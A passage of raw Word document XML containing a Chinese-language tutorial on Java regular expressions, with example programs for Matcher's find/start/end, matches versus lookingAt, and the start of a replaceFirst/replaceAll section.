        <w:t xml:space="preserve">         System.out.println("NO MATCH");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCDAA6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1031CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54535844" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E1DE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计子串出现的次数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D90F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Matcher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372F251A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Pattern;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF3A54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D60DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class RegexMatches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3859C88A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F3032" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    private static final </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>String REGEX = "\\bcat\\b";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98D4BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    private static final String INPUT =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15264A0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                                    "cat cat cat cattie cat";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F3A412" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EA2E17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public static void main( String[] args ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F70364" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Pattern p = Pattern.compile(REGEX);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A07C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Matcher m = p.matcher(INPUT); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> matcher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4118CE88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB8198F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B98135" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       while(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.find()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E8447" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B457035" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.println("Match number "+count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE87FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.println("start(): "+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.start()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E38339" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.println("end(): "+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.end()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DEFC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54AFD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEA78F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172F5581" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>matches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lookingAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEFEB11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> lookingAt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法都用来尝试匹配一个输入序列模式。它们的不同是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求整个序列都匹配，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lookingAt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不要求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48199D4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lookingAt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法虽然不需要整句都匹配，但是需要从第一个字符开始匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B480AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两个方法经常在输入字符串的开始使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB8F6F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE72937" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Matcher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524E166" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Pattern;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E7C54C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6088B3C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class RegexMatches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7765917C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B4B18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    private static final String REGEX = "foo";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CC93BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    private static final String INPUT = "fooooooooooooooooo";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134C8019" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    private static final String INPUT2 = "ooooofoooooooooooo";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DAE8AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    private static Pattern pattern;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011CBAB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    private static Matcher matcher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632F8BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    private static Matcher matcher2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D155F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A9B0FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public static void main( String[] args ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F7745C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pattern = Pattern.compile(REGEX);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5537CBD5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>matcher = pattern.matcher(INPUT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58937F1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">       matcher2 = pattern.matcher(INPUT2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D80B2D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D589447" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       System.out.println("Current REGEX is: "+REGEX);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3D42E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       System.out.println("Current INPUT is: "+INPUT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C9353" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       System.out.println("Current INPUT2 is: "+INPUT2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DECB737" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D675C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       System.out.println("lookingAt(): "+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>matcher.lookingAt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B31EF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       System.out.println("matches(): "+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>matcher.matches()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB7F52C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       System.out.println("lookingAt(): "+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>matcher2.lookingAt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55457419" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6483B820" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3B83AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replaceFirst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replaceAll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0237A52C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">replaceFirst </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> replaceAll </w:t>
      </w:r>
      <w:r>
        <w:t>方法用来替换匹配正则表达式的文本。不同的是，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">replaceFirst </w:t>
      </w:r>
      <w:r>
        <w:t>替换首次匹配，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">replaceAll </w:t>
      </w:r>
      <w:r>
        <w:t>替换所有匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC83F3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2EA7C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Matcher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E6887A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
